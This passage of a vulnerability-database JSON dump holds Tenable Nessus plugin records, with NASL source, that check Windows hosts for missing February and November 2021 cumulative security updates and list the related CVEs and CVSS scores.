value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601345');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601345])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-24T15:37:24", "description": "The remote Windows host is missing security update. See Vendor Advisory for KB5007205", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007205: Windows 2022 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-04-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007205.NASL", "href": "https://www.tenable.com/plugins/nessus/154994", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154994);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007205\");\n script_xref(name:\"MSFT\", value:\"MS21-5007205\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007205: Windows 2022 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update. See\nVendor Advisory for KB5007205\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007205\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5007205.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007205');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'20348',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007205])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:03:17", "description": "The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24075, CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601319: Windows 10 version 2004 Feb 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601319.NASL", "href": "https://www.tenable.com/plugins/nessus/146345", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146345);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24075\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601319\");\n script_xref(name:\"MSFT\", value:\"MS21-4601319\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601319: Windows 10 version 2004 Feb 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24075,\n CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4601319\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4601319 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list(\n '4601319'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n|| \nsmb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-24T15:38:21", "description": "The remote Windows host is missing security update 5007186.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285, CVE-2021-42286)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007186: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 (November 2021) ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42286", "CVE-2021-42287", "CVE-2021-42288", "CVE-2021-42291"], "modified": "2022-04-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007186.NASL", "href": "https://www.tenable.com/plugins/nessus/154986", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154986);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42286\",\n \"CVE-2021-42287\",\n \"CVE-2021-42288\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007186\");\n script_xref(name:\"MSFT\", value:\"MS21-5007186\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007186: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 (November 2021) \");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007186.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42280, CVE-2021-42283,\n CVE-2021-42285, CVE-2021-42286)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42275,\n CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007186\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007186.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007186');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19041',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007186])\n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19042',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007186]) \n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19043',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007186]) \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T16:54:11", "description": "The remote Windows host is missing security update 5007206.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42278, CVE-2021-42280, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007206: Windows 10 Version 1809 and Windows Server 2019 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42288", "CVE-2021-42291"], "modified": "2022-04-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007206.NASL", "href": "https://www.tenable.com/plugins/nessus/154993", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154993);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42288\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007206\");\n script_xref(name:\"MSFT\", value:\"MS21-5007206\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007206: Windows 10 Version 1809 and Windows Server 2019 Security Update (November 